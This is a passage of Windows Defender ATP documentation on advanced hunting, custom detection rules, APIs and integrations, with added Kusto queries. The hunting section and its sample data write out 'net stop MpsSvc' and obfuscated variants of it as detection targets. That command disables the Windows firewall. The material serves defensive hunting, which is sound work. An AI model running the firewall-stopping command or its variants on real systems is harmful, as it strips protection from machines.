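An added example (not from the original page) that applies the composite process key described above to a join, and at the same time follows the performance guidance from the previous section: time filter first, the smaller table on the left, only the needed columns projected on both sides, and in~ for the executable names. It pairs each process spawned by an Office application with the outbound connections that same process made. The one-day window, the list of Office executables and the Public remote-IP filter are this example's own assumptions; column names come from the schema reference on this page.

```kusto
// Added example: joining on machine + process ID + process creation time.
let lookback = 1d;
// Left side (the smaller set): processes launched by an Office application.
// Only the columns needed for the join and the result are projected.
let officeChildren =
    ProcessCreationEvents
    | where EventTime > ago(lookback)
    | where InitiatingProcessFileName in~ ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
    | project MachineId, ComputerName, ProcessId, ProcessCreationTime,
              FileName, ProcessCommandLine, InitiatingProcessFileName;
// Right side (the larger set): connections to public IP addresses, projected down as well.
let outbound =
    NetworkCommunicationEvents
    | where EventTime > ago(lookback)
    | where RemoteIPType == "Public"
    | project MachineId, InitiatingProcessId, InitiatingProcessCreationTime,
              RemoteIP, RemotePort, RemoteUrl, ConnectionTime = EventTime;
officeChildren
| join kind=inner outbound
    // MachineId alone is not enough and neither is the PID: the creation time
    // distinguishes this process from an earlier one that reused the same PID.
    on MachineId,
       $left.ProcessId == $right.InitiatingProcessId,
       $left.ProcessCreationTime == $right.InitiatingProcessCreationTime
| summarize Connections     = count(),
            Destinations    = makeset(strcat(RemoteIP, ":", RemotePort)),
            FirstConnection = min(ConnectionTime)
    by ComputerName, FileName, ProcessCommandLine, InitiatingProcessFileName,
       ProcessId, ProcessCreationTime
| order by Connections desc
```

If you drop the ProcessCreationTime condition from the join, a document-spawned process that exited an hour ago can be credited with the connections of an unrelated process that later received the same PID on the same machine, which is exactly the mix-up the text warns about.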
Using command line queries
Command lines may vary - when applicable, filter on file names and do fuzzy matching.
There are numerous ways to construct a command line to accomplish a task.
For example, a malicious attacker could specify the process image file name without a path, with full path, without
the file extension, using environment variables, add quotes, and others. In addition, the attacker can also change
the order of some parameters, add multiple quotes or spaces, and much more.
To create more durable queries using command lines, we recommend the following guidelines:
Identify the known processes (such as net.exe, psexec.exe, and others) by matching on the filename fields,
instead of filtering on the command line field.
When querying for command line arguments, don't look for an exact match on multiple unrelated arguments in
a certain order. Instead, use regular expressions or use multiple separate contains operators.
Use case insensitive matches. For example, use '=~', 'in~', 'contains' instead of '==', 'in' or 'contains_cs'
To mitigate DOS command line obfuscation techniques, consider removing quotes, replacing commas with
spaces, and replacing multiple consecutive spaces with a single space. This is just the start of handling DOS
obfuscation techniques, but it does mitigate the most common ones.
The following example queries show various ways to construct a query that looks for net.exe being used to stop
the Windows Defender Firewall service (MpsSvc):

// Non-durable query - do not use
ProcessCreationEvents
| where ProcessCommandLine == "net stop MpsSvc"
| limit 10

// Better query - filters on filename, does case-insensitive matches
ProcessCreationEvents
| where EventTime > ago(7d) and FileName in~ ("net.exe", "net1.exe") and ProcessCommandLine contains "stop"
    and ProcessCommandLine contains "MpsSvc"

// Best query also ignores quotes
ProcessCreationEvents
| where EventTime > ago(7d) and FileName in~ ("net.exe", "net1.exe")
| extend CanonicalCommandLine=replace("\"", "", ProcessCommandLine)
| where CanonicalCommandLine contains "stop" and CanonicalCommandLine contains "MpsSvc"
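The guidelines above list three normalizations (remove quotes, turn commas into spaces, collapse runs of whitespace), but the "best query" only handles quotes. The following added example, which is not part of the original page, implements all three as a reusable function and runs it over a handful of constructed command lines (not real telemetry) so the effect is visible without access to a tenant. It also uses has instead of contains, as the performance section recommends for whole tokens. The function and the sample rows are this example's own; to hunt with it, replace the samples table with ProcessCreationEvents and a time filter.

```kusto
// Added example: canonicalize a command line before matching on it.
// Removes quotes, turns commas into spaces, collapses repeated whitespace and trims.
let canonical = (cmd: string) {
    trim(@"\s+",                                  // strip leading/trailing whitespace
        replace(@"\s+", " ",                      // collapse runs of whitespace
            replace(@",", " ",                    // commas act as separators in cmd.exe
                replace('"', "", cmd))))          // drop quotes
};
// Constructed sample rows, not real telemetry. All but the last stop the firewall service.
let samples = datatable(FileName: string, ProcessCommandLine: string) [
    "net.exe",  'net stop MpsSvc',
    "net1.exe", 'net1   stop   "MpsSvc"',
    "NET.EXE",  '"C:\\Windows\\System32\\net.exe" stop,MpsSvc',
    "net.exe",  '   net  stop   MpsSvc   ',
    "net.exe",  'net start MpsSvc'
];
samples
| where FileName in~ ("net.exe", "net1.exe")
| extend CanonicalCommandLine = canonical(ProcessCommandLine)
// has matches whole tokens case-insensitively, so "stopped" or a different
// service name whose text merely contains "MpsSvc" does not slip through.
| where CanonicalCommandLine has "stop" and CanonicalCommandLine has "MpsSvc"
| project FileName, ProcessCommandLine, CanonicalCommandLine
```

The query returns the four stop variants with identical CanonicalCommandLine values and drops the net start row. The exact-match query at the top of this section would have caught only the first of the four.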



Custom detections overview
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Alerts in Windows Defender ATP are surfaced through the system based on signals gathered from endpoints. With
custom detections, you can create custom queries to monitor events for any kind of behavior, such as suspicious or
emerging threats.
This is done by leveraging Advanced hunting through the creation of custom detection rules.
Custom detections are queries that run periodically every 24 hours and can be configured so that, when the query
results meet the criteria you set, alerts are created and surfaced in Windows Defender Security Center. These alerts
are treated like any other alert in the system.
This capability is particularly useful when you want to proactively prevent threats and be notified quickly of
emerging threats.

Related topic
Create custom detection rules
Create custom detection rules
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
1. In the navigation pane, select Advanced hunting.
2. Select an existing query that you'd like to base the monitor on or create a new query.
3. Select Create detection rule.
4. Specify the alert details:
Alert title
Severity
Category
Description
Recommended actions
5. Click Create.

TIP
TIP #1: Running the query for the first time before saving it can help you find any mistakes or errors and give you a preview
of the data you can expect to be returned.
When a new detection rule is created, it will run for the first time (it might take a few minutes) and raise any alerts created by
this rule. After that, the rule will automatically run every 24 hours.
TIP #2: Since the detection automatically runs every 24 hours, it's best to query data in the last 24 hours.
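An added example, not from the original page, of a query shaped for a detection rule. It is scoped to the last 24 hours to match the rule's schedule, and it projects EventTime, ComputerName and ReportId, which the schema reference on this page says are needed together to identify a unique event, so every alert can be traced back to the exact event that raised it. The behavior chosen (scheduled-task creation by a user account) and the built-in accounts excluded are this example's own assumptions.

```kusto
// Added example: a detection query scoped to the rule's 24-hour cadence.
ProcessCreationEvents
// The rule runs every 24 hours, so look back exactly that far: a longer window
// re-alerts on events an earlier run already covered, a shorter one misses events.
| where EventTime > ago(24h)
// schtasks.exe /create registers a scheduled task, a common persistence technique.
| where FileName =~ "schtasks.exe" and ProcessCommandLine has "create"
// Ignore the built-in service accounts, which create tasks as part of normal
// operation (assumption: these are the account names to exclude in the environment).
| where AccountName !in~ ("system", "local service", "network service")
// Columns that identify the event uniquely (EventTime + ComputerName + ReportId)
// plus the context an analyst needs when the alert fires.
| project EventTime, ComputerName, ReportId, AccountDomain, AccountName,
          ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
```

Run it once from the Advanced hunting page before creating the rule: if it returns a few hundred rows of software-update tasks, tighten the predicate (for example by excluding the updater's account or task name) before turning it into an alert source.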

Manage existing custom detection rules


You can view the existing rules in your network, see the last results of each rule, navigate to all alerts created by
each rule, and modify existing rules.
1. In the navigation pane, select Settings > Custom detections. You'll see all the detections created in the
system.
2. Select one of the rules to take any of the following actions:
Open related alerts - See all the alerts that were raised by this rule.
Run - Run the selected detection immediately.

NOTE
The next run for the query will be in 24 hours after the last run.

Edit - Modify the settings of the rule.


Modify query - View and edit the query itself.
Turn off - Stop the query from running.
Delete
Related topic
Custom detections overview
Overview of management and APIs
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)


Windows Defender ATP supports a wide variety of options to ensure that customers can easily adopt the platform.
Acknowledging that customer environments and structures vary, Windows Defender ATP was created with the
flexibility and granular control to fit varying customer requirements.
Machine onboarding is fully integrated into System Center Configuration Manager and Microsoft Intune for client
machines and Azure Security Center for server machines, providing a complete end-to-end experience of
configuration, deployment, and monitoring. In addition, Windows Defender ATP supports Group Policy and other
third-party tools used for machine management.
Windows Defender ATP provides fine-grained control over what users with access to the portal can see and do
through role-based access control (RBAC). The RBAC model supports all flavors of security team structure:
Globally distributed organizations and security teams
Tiered-model security operations teams
Fully segregated divisions with a single centralized global security operations team
The Windows Defender ATP solution is built on top of an integration-ready platform:
It supports integration with a number of security information and event management (SIEM) solutions and
also exposes APIs to fully support pulling all the alerts and detection information into any SIEM solution.
It supports a rich set of application programming interfaces (APIs), providing flexibility for those who are already
heavily invested in data enrichment and automation:
Enriching events coming from other security systems with footprint or prevalence information
Triggering file- or machine-level response actions through APIs
Keeping systems in sync, such as importing machine tags from asset management systems into
Windows Defender ATP, or synchronizing alert and incident status across ticketing systems and Windows
Defender ATP.
An important aspect of machine management is the ability to analyze the environment from varying and broad
perspectives. This often helps drive new insights and proper priority identification:
The Secure score dashboard provides a metrics-based method of prioritizing the most important proactive
security measures.
Windows Defender ATP includes a built-in Power BI based reporting solution to quickly review trends and
details related to Windows Defender ATP alerts and the secure score of machines. The platform also supports full
customization of the reports, including combining Windows Defender ATP data with your own data streams to
produce business-specific reports.

In this section
TOPIC DESCRIPTION

Understand threat intelligence concepts Learn about alert definitions, indicators of compromise, and
other threat intelligence concepts.

Supported Windows Defender ATP APIs Learn about the individual supported entities you can run
API calls against, and details such as HTTP request values,
request headers and expected responses.

Managed security service provider Get a quick overview on managed security service provider
support.

Related topics
Onboard machines
Enable the custom threat intelligence application
Windows Defender ATP Public API
Pull alerts to your SIEM tools
Create and build Power BI reports using Windows Defender ATP data
Role-based access control
Understand threat intelligence concepts
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)


Advanced cybersecurity attacks comprise multiple complex malicious events, attributes, and contextual
information. Identifying and deciding which of these activities qualify as suspicious can be a challenging task. Your
knowledge of known attributes and abnormal activities specific to your industry is fundamental in knowing when
to flag an observed behavior as suspicious.
With Windows Defender ATP, you can create custom threat alerts that help you keep track of possible attack
activities in your organization. You can flag suspicious events to piece together clues and possibly stop an attack
chain. These custom threat alerts only appear in your organization and flag the events that you set them to track.
Before creating custom threat alerts, it's important to know the concepts behind alert definitions and indicators of
compromise (IOCs) and the relationship between them.

Alert definitions
Alert definitions are contextual attributes that can be used collectively to identify early clues on a possible
cybersecurity attack. These indicators are typically a combination of activities, characteristics, and actions taken by
an attacker to successfully achieve the objective of an attack. Monitoring these combinations of attributes is
critical in gaining a vantage point against attacks and possibly interfering with the chain of events before an
attacker's objective is reached.

Indicators of compromise (IOC)


IOCs are individually-known malicious events that indicate that a network or machine has already been breached.
Unlike alert definitions, these indicators are considered as evidence of a breach. They are often seen after an
attack has already been carried out and the objective has been reached, such as exfiltration. Keeping track of IOCs
is also important during forensic investigations. Although it might not provide the ability to intervene with an
attack chain, gathering these indicators can be useful in creating better defenses for possible future attacks.

Relationship between alert definitions and IOCs


In the context of Windows Defender ATP, alert definitions are containers for IOCs and define the alert, including
the metadata that is raised in case of a specific IOC match. Various metadata is provided as part of the alert
definitions, such as the alert definition name, the name of the attack, severity, and description, along with other
options. For more information on available metadata options, see Threat Intelligence API metadata.
Each IOC defines the concrete detection logic based on its type and value as well as its action, which determines
how it is matched. It is bound to a specific alert definition that defines how a detection is displayed as an alert in
the Windows Defender ATP console.
Here is an example of an IOC:
Type: Sha1
Value: 92cfceb39d57d914ed8b14d0e37643de0797ae56
Action: Equals
IOCs have a many-to-one relationship with alert definitions such that an alert definition can have many IOCs that
correspond to it.

Related topics
Enable the custom threat intelligence API in Windows Defender ATP
Create custom alerts using the threat intelligence API
PowerShell code examples for the custom threat intelligence API
Python code examples for the custom threat intelligence API
Experiment with custom threat intelligence alerts
Troubleshoot custom threat intelligence issues
Windows Defender ATP API overview
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)


Windows Defender ATP exposes much of its data and actions through a set of programmatic APIs. Those APIs will
enable you to automate workflows and innovate based on Windows Defender ATP capabilities. The API access
requires OAuth2.0 authentication. For more information, see OAuth 2.0 Authorization Code Flow.
In general, you’ll need to take the following steps to use the APIs:
Create an AAD application
Get an access token using this application
Use the token to access Windows Defender ATP API
You can access the Windows Defender ATP API with Application Context or User Context.
Application Context: (Recommended)
Used by apps that run without a signed-in user present, for example, apps that run as background services
or daemons.
Steps that need to be taken to access the Windows Defender ATP API with application context:
1. Create an AAD Web-Application.
2. Assign the desired permissions to the application, for example, 'Read Alerts' or 'Isolate Machines'.
3. Create a key for this application.
4. Get a token using the application with its key.
5. Use the token to access the Windows Defender ATP API.
For more information, see Get access with application context.
User Context:
Used to perform actions in the API on behalf of a user.
Steps that need to be taken to access the Windows Defender ATP API with user context:
1. Create an AAD Native-Application.
2. Assign the desired permissions to the application, for example, 'Read Alerts' or 'Isolate Machines'.
3. Get a token using the application with user credentials.
4. Use the token to access the Windows Defender ATP API.
For more information, see Get access with user context.

Related topics
Windows Defender ATP APIs
Access Windows Defender ATP with application context
Access Windows Defender ATP with user context
Managed security service provider support
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)


Security is recognized as a key component of running an enterprise. However, some organizations might not have
the capacity or expertise to have a dedicated security operations team to manage the security of their endpoints
and network, and others may want to have a second set of eyes to review alerts in their network.
To address this demand, managed security service providers (MSSPs) offer managed detection and response (MDR)
services on top of Windows Defender ATP.
Windows Defender ATP supports this scenario by allowing MSSPs to take the following actions:
Get access to the MSSP customer's Windows Defender Security Center portal
Get email notifications, and
Fetch alerts through security information and event management (SIEM) tools

Related topic
Configure managed security service provider integration
Microsoft Threat Protection
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Windows Defender ATP is part of the Microsoft Threat Protection solution that helps implement end-to-end
security across possible attack surfaces in the modern workplace.
For more information on Microsoft Threat Protection, see Announcing Microsoft Threat Protection.
Microsoft's multiple layers of threat protection across data, applications, devices, and identities can help protect
your organization from advanced cyber threats.
Each layer in the threat protection stack plays a critical role in protecting customers. The deep integration between
these layers results in better protected customers.

Azure Advanced Threat Protection (Azure ATP)


Suspicious activities are processes running under a user context. The integration between Windows Defender ATP
and Azure ATP provides the flexibility of conducting cyber security investigation across activities and identities.

Azure Security Center


Windows Defender ATP provides a comprehensive server protection solution, including endpoint detection and
response (EDR) capabilities on Windows Servers.

Azure Information Protection


Keep sensitive data secure while enabling productivity in the workplace through data discovery and data
protection.

Conditional access
Windows Defender ATP's dynamic machine risk score is integrated into the conditional access evaluation,
ensuring that only secure devices have access to resources.

Microsoft Cloud App Security


Microsoft Cloud App Security leverages Windows Defender ATP endpoint signals to allow direct visibility into
cloud application usage including the use of unsupported cloud services (shadow IT) from all Windows Defender
ATP monitored machines.

Office 365 Advanced Threat Protection (Office 365 ATP)


Office 365 ATP helps protect your organization from malware in email messages or files through ATP Safe Links,
ATP Safe Attachments, advanced Anti-Phishing, and spoof intelligence capabilities. The integration between Office
365 ATP and Windows Defender ATP enables security analysts to go upstream to investigate the entry point of an
attack. Through threat intelligence sharing, attacks can be contained and blocked.
Skype for Business
The Skype for Business integration provides a way for analysts to communicate with a potentially compromised
user or device owner through a simple button in the portal.

Related topic
Protect users, data, and devices with conditional access
Enable conditional access to better protect users,
devices, and data
4/5/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Conditional access is a capability that helps you better protect your users and enterprise information by making
sure that only secure devices have access to applications.
With conditional access, you can control access to enterprise information based on the risk level of a device. This
helps keep trusted users on trusted devices using trusted applications.
You can define security conditions under which devices and applications can run and access information from your
network by enforcing policies to stop applications from running until a device returns to a compliant state.
The implementation of conditional access in Windows Defender ATP is based on Microsoft Intune (Intune) device
compliance policies and Azure Active Directory (Azure AD) conditional access policies.
The compliance policy is used with conditional access to allow only devices that fulfill one or more device
compliance policy rules to access applications.

Understand the conditional access flow


Conditional access is put in place so that when a threat is seen on a device, access to sensitive content is blocked
until the threat is remediated.
The flow begins with machines being seen to have a low, medium, or high risk. These risk determinations are then
sent to Intune.
Depending on how you configure policies in Intune, conditional access can be set up so that when certain
conditions are met, the policy is applied.
For example, you can configure Intune to apply conditional access on devices that have a high risk.
In Intune, a device compliance policy is used in conjunction with Azure AD conditional access to block access to
applications. In parallel, an automated investigation and remediation process is launched.
A user can still use the device while the automated investigation and remediation is taking place, but access to
enterprise data is blocked until the threat is fully remediated.
To resolve the risk found on a device, you'll need to return the device to a compliant state. A device returns to a
compliant state when there is no risk seen on it.
There are three ways to address a risk:
1. Use manual or automated remediation.
2. Resolve active alerts on the machine. This will remove the risk from the machine.
3. Remove the machine from the active policies; conditional access will then no longer be applied
on the machine.
Manual remediation requires a secops admin to investigate an alert and address the risk seen on the device. The
automated remediation is configured through configuration settings provided in the following section, Configure
conditional access.
When the risk is removed either through manual or automated remediation, the device returns to a compliant state
and access to applications is granted.
The following example sequence of events explains conditional access in action:
1. A user opens a malicious file and Windows Defender ATP flags the device as high risk.
2. The high risk assessment is passed along to Intune. In parallel, an automated investigation is initiated to
remediate the identified threat. A manual remediation can also be done to remediate the identified threat.
3. Based on the policy created in Intune, the device is marked as not compliant. The assessment is then
communicated to Azure AD by the Intune conditional access policy. In Azure AD, the corresponding policy is
applied to block access to applications.
4. The manual or automated investigation and remediation is completed and the threat is removed. Windows
Defender ATP sees that there is no risk on the device and Intune assesses the device to be in a compliant state.
Azure AD applies the policy which allows access to applications.
5. Users can now access applications.

Related topic
Configure conditional access in Windows Defender ATP
Microsoft Cloud App Security in Windows Defender
ATP overview
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

IMPORTANT
Some information relates to prereleased product which may be substantially modified before it's commercially released.
Microsoft makes no warranties, express or implied, with respect to the information provided here.

Microsoft Cloud App Security (Cloud App Security) is a comprehensive solution that gives visibility into cloud apps
and services by allowing you to control and limit access to cloud apps, while enforcing compliance requirements
on data stored in the cloud. For more information, see Cloud App Security.

NOTE
This feature is available with an E5 license for Enterprise Mobility + Security on machines running Windows 10 version 1809
or later.

Windows Defender ATP and Cloud App Security integration


Cloud App Security discovery relies on cloud traffic logs being forwarded to it from enterprise firewall and proxy
servers. Windows Defender ATP integrates with Cloud App Security by collecting and forwarding all cloud app
networking activities, providing unparalleled visibility to cloud app usage. The monitoring functionality is built into
the device, providing complete coverage of network activity.
The integration provides the following major improvements to the existing Cloud App Security discovery:
Available everywhere - Since the network activity is collected directly from the endpoint, it's available
wherever the device is, on or off the corporate network, as it no longer depends on traffic routed through the
enterprise firewall or proxy servers.
Works out of the box, no configuration required - Forwarding cloud traffic logs to Cloud App Security
requires firewall and proxy server configuration. With the Windows Defender ATP and Cloud App Security
integration, there's no configuration required. Just switch it on in Windows Defender Security Center
settings and you're good to go.
Device context - Cloud traffic logs lack device context. Windows Defender ATP network activity is reported
with the device context (which device accessed the cloud app), so you are able to understand exactly where
(device) the network activity took place, in addition to who (user) performed it.

For more information about cloud discovery, see Working with discovered apps.

Related topic
Configure Microsoft Cloud App Security integration
Information protection in Windows overview
4/22/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

IMPORTANT
Some information relates to prereleased product which may be substantially modified before it's commercially released.
Microsoft makes no warranties, express or implied, with respect to the information provided here.

Information protection is an integral part of Microsoft 365 Enterprise suite, providing intelligent protection to keep
sensitive data secure while enabling productivity in the workplace.
Windows Defender ATP is seamlessly integrated in Microsoft Threat Protection to provide a complete and
comprehensive data loss prevention (DLP) solution for Windows devices. This solution is delivered and managed
as part of the unified Microsoft 365 information protection suite.

TIP
Read our blog post about how Windows Defender ATP integrates with Microsoft Information Protection to discover, protect,
and monitor sensitive data on Windows devices.

Windows Defender ATP applies two methods to discover and protect data:
Data discovery - Identify sensitive data at risk on Windows devices
Data protection - Windows Information Protection (WIP) applied as the outcome of an Azure Information Protection label

Data discovery
Windows Defender ATP automatically discovers files with sensitivity labels on Windows devices when the feature
is enabled. You can enable the Azure Information Protection integration feature from Windows Defender Security
Center. For more information, see Configure advanced features.
After enabling the Azure Information Protection integration, data discovery signals are immediately forwarded to
Azure Information Protection from the device. When a labeled file is created or modified on a Windows device,
Windows Defender ATP automatically reports the signal to Azure Information Protection.
The reported signals can be viewed on the Azure Information Protection - Data discovery dashboard.
Azure Information Protection - Data discovery dashboard
This dashboard presents summarized information about the data discovered by both Windows Defender ATP
and Azure Information Protection. Data from Windows Defender ATP is marked with Location Type - Endpoint.

Notice the Device Risk column on the right. This device risk is derived directly from Windows Defender ATP,
indicating the risk level of the device where the file was discovered, based on the active security threats
detected by Windows Defender ATP.
Clicking the device risk level will redirect you to the device page in Windows Defender ATP, where you can get a
comprehensive view of the device security status and its active alerts.

NOTE
Windows Defender ATP does not currently report the Information Types.

Log Analytics
Data discovery based on Windows Defender ATP is also available in Azure Log Analytics, where you can perform
complex queries over the raw data.
For more information on Azure Information Protection analytics, see Central reporting for Azure Information
Protection.
Open Azure Log Analytics in Azure Portal and open a query builder (standard or classic).
To view Windows Defender ATP data, perform a query that contains:

InformationProtectionLogs_CL
| where Workload_s == "Windows Defender"

Prerequisites:
Customers must have a subscription for Azure Information Protection.
Enable Azure Information Protection integration in Windows Defender Security Center:
Go to Settings in Windows Defender Security Center, click on Advanced Settings under General.
Data protection
For data to be protected, it must first be identified through labels. Sensitivity labels are created in Office Security
and Compliance (SCC). Windows Defender ATP then uses the labels to identify endpoints that need Windows
Information Protection (WIP) applied on them.
When you create sensitivity labels, you can set the information protection functionalities that will be applied on the
file. The setting that applies to Windows Defender ATP is the Data loss prevention. You'll need to turn on the Data
loss prevention and select Enable Windows end point protection (DLP for devices).

Once the policy is set and published, Windows Defender ATP automatically enables WIP for labeled files. When a
labeled file is created or modified on a Windows device, Windows Defender ATP automatically detects it and
enables WIP on that file if its label corresponds with Office Security and Compliance (SCC) policy.
This functionality expands the coverage of WIP to protect files based on their label, regardless of their origin.
For more information, see Configure information protection in Windows.

Related topics
How Windows Information Protection protects files with a sensitivity label
Microsoft Threat Experts
5/2/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

IMPORTANT
Some information relates to prereleased product which may be substantially modified before it's commercially released.
Microsoft makes no warranties, express or implied, with respect to the information provided here.

Microsoft Threat Experts is a managed hunting service that provides Security Operation Centers (SOCs) with
expert level monitoring and analysis to help them ensure that critical threats in their unique environments don’t
get missed.
This new capability provides expert-driven insights and data through targeted attack notification and access to
experts on demand.

Targeted attack notification


Microsoft Threat Experts provides proactive hunting for the most important threats to your network, including
human adversary intrusions, hands-on-keyboard attacks, or advanced attacks like cyberespionage. The managed
hunting service includes:
Threat monitoring and analysis, reducing dwell time and risk to the business
Hunter-trained artificial intelligence to discover and prioritize both known and unknown attacks
Identifying the most important risks, helping SOCs maximize time and energy
Scope of compromise and as much context as can be quickly delivered to enable fast SOC response.

Collaborate with experts, on demand


NOTE
The Microsoft Threat Experts' experts-on-demand capability is still in preview. You can only use the experts-on-demand
capability if you have applied for preview and your application has been approved.

Customers can engage our security experts directly from within Windows Defender Security Center for timely and
accurate response. Experts provide insights needed to better understand the complex threats affecting your
organization, from alert inquiries, potentially compromised machines, root cause of a suspicious network
connection, to additional threat intelligence regarding ongoing advanced persistent threat campaigns. With this
capability, you can:
Get additional clarification on alerts including root cause or scope of the incident
Gain clarity into suspicious machine behavior and next steps if faced with an advanced attacker
Determine risk and protection regarding threat actors, campaigns, or emerging attacker techniques
Seamlessly transition to Microsoft Incident Response (IR) or other third-party Incident Response services when
necessary

Related topic
Configure Microsoft Threat Experts capabilities
Windows Defender Advanced Threat Protection
portal overview
4/22/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Enterprise security teams can use Windows Defender Security Center to monitor and assist in responding to alerts
of potential advanced persistent threat (APT) activity or data breaches.
You can use Windows Defender Security Center to:
View, sort, and triage alerts from your endpoints
Search for more information on observed indicators such as files and IP Addresses
Change Windows Defender ATP settings, including time zone and review licensing information.

Windows Defender Security Center


When you open the portal, you’ll see the main areas of the application:
(1) Navigation pane
(2) Main portal
(3) Search, Community center, Time settings, Help and support, Feedback

NOTE
Malware related detections will only appear if your machines are using Windows Defender Antivirus as the default real-time
protection antimalware product.

You can navigate through the portal using the menu options available in all sections. Refer to the following table
for a description of each section.

AREA DESCRIPTION

(1) Navigation pane: Use the navigation pane to move between the Dashboards, Alerts queue, Automated investigations, Machines list, Service health, Advanced hunting, and Settings.

Dashboards: Access the Security operations, the Secure Score, or Threat analytics dashboard.

Incidents: View alerts that have been aggregated as incidents.

Alerts: View alerts generated from machines in your organizations.

Automated investigations: Displays a list of automated investigations that have been conducted in the network, the status of each investigation and other details such as when the investigation started and the duration of the investigation.

Advanced hunting: Advanced hunting allows you to proactively hunt and investigate across your organization using a powerful search and query tool.

Machines list: Displays the list of machines that are onboarded to Windows Defender ATP, some information about them, and the corresponding number of alerts.

Service health: Provides information on the current status of the Windows Defender ATP service. You'll be able to verify that the service health is healthy or if there are current issues.

Settings: Shows the settings you selected during onboarding and lets you update your industry preferences and retention policy period. You can also set other configuration settings such as email notifications, activate the preview experience, enable or turn off advanced features, SIEM integration, threat intel API, build Power BI reports, and set baselines for the Secure Score dashboard.

(2) Main portal: Main area where you will see the different views such as the Dashboards, Alerts queue, and Machines list.

(3) Community center, Time settings, Help and support, Feedback:
Community center - Access the Community center to learn, collaborate, and share experiences about the product.
Time settings - Gives you access to the configuration settings where you can set time zones and view license information.
Help and support - Gives you access to the Windows Defender ATP guide, Microsoft support, and Premier support.
Feedback - Access the feedback button to provide comments about the portal.

Windows Defender ATP icons


The following table provides information on the icons used throughout the portal:

ICON DESCRIPTION

Windows Defender ATP logo
Alert – Indication of an activity correlated with advanced attacks.
Detection – Indication of a malware threat detection.
Active threat – Threats actively executing at the time of detection.
Remediated – Threat removed from the machine.
Not remediated – Threat not removed from the machine.
Indicates events that triggered an alert in the Alert process tree.
Machine icon
Windows Defender Antivirus events
Windows Defender Application Guard events
Windows Defender Device Guard events
Windows Defender Exploit Guard events
Windows Defender SmartScreen events
Windows Firewall events
Response action
Process events
Network events
File events
Registry events
Load DLL events
Other events
Access token modification
File creation
Signer
File path
Command line
Unsigned file
Process tree
Memory allocation
Process injection
Powershell command run
Community center
Notifications
Automated investigation - no threats found
Automated investigation - failed
Automated investigation - partially investigated
Automated investigation - terminated by system
Automated investigation - pending
Automated investigation - running
Automated investigation - remediated
Automated investigation - partially remediated
Threat & Vulnerability Management - threat insights
Threat & Vulnerability Management - possible active alert
Threat & Vulnerability Management - recommendation insights
Related topics
Understand the Windows Defender Advanced Threat Protection portal
View the Security operations dashboard
View the Secure Score dashboard and improve your secure score
View the Threat analytics dashboard and take recommended mitigation actions
Get started with Windows Defender Advanced Threat
Protection
4/30/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

TIP
Learn about the latest enhancements in Windows Defender ATP: What's new in Windows Defender ATP.
Windows Defender ATP demonstrated industry-leading optics and detection capabilities in the recent MITRE evaluation.
Read: Insights from the MITRE ATT&CK-based evaluation.

Learn about the minimum requirements and initial steps you need to take to get started with Windows Defender
ATP.
The following capabilities are available across multiple products that make up the Windows Defender ATP
platform.
Threat & Vulnerability Management
Effectively identifying, assessing, and remediating endpoint weaknesses is pivotal in running a healthy security
program and reducing organizational risk. This infrastructure correlates endpoint detection and response (EDR)
insights with endpoint vulnerabilities in real time, thus reducing organizational vulnerability exposure and increasing
threat resilience.
Attack surface reduction
The attack surface reduction set of capabilities provides the first line of defense in the stack. By ensuring that
configuration settings are properly set and exploit mitigation techniques are applied, this set of capabilities resists
attacks and exploitation.
Next generation protection
To further reinforce the security perimeter of your network, Windows Defender ATP uses next generation
protection designed to catch all types of emerging threats.
Endpoint detection and response
Endpoint detection and response capabilities are put in place to detect, investigate, and respond to advanced
threats that may have made it past the first two security pillars.
Auto investigation and remediation
In conjunction with being able to quickly respond to advanced attacks, Windows Defender ATP offers automatic
investigation and remediation capabilities that help reduce the volume of alerts in minutes at scale.
Secure score
Windows Defender ATP provides a security posture capability to help you dynamically assess the security state of
your enterprise network, identify unprotected systems, and take recommended actions to improve the overall
security state of your network.
Microsoft Threat Experts
Microsoft Threat Experts is the new managed threat hunting service in Windows Defender ATP that provides
proactive hunting, prioritization, and additional context and insights that further empower security operations
centers (SOCs) to identify and respond to threats quickly and accurately. It provides an additional layer of expertise
and optics that Microsoft customers can utilize to augment security operation capabilities as part of Microsoft 365.
Advanced hunting
Advanced hunting allows you to hunt for possible threats across your organization using a powerful search and
query tool. You can also create custom detection rules based on the queries you created and surface alerts in
Windows Defender Security Center.
Management and APIs
Integrate Windows Defender Advanced Threat Protection into your existing workflows.
Microsoft threat protection
Bring the power of Microsoft Threat Protection to your organization.

In this section
TOPIC DESCRIPTION

Minimum requirements: Learn about the requirements for onboarding machines to the platform.

Validate licensing and complete setup: Get guidance on how to check that licenses have been provisioned to your organization and how to access the portal for the first time.

Preview features: Learn about new features in the Windows Defender ATP preview release and be among the first to try upcoming features by turning on the preview experience.

Data storage and privacy: Explains the data storage and privacy details related to Windows Defender ATP.

Assign user access to the portal: Set permissions to manage who can access the portal. You can set basic permissions or set granular permissions using role-based access control (RBAC).

Evaluate Windows Defender ATP: Evaluate the various capabilities in Windows Defender ATP and test features out.

Access the Windows Defender Security Center Community Center: The Windows Defender ATP Community Center is a place where community members can learn, collaborate, and share experiences about the product.
What's new in Windows Defender ATP
5/3/2019 • 6 minutes to read

Applies to:
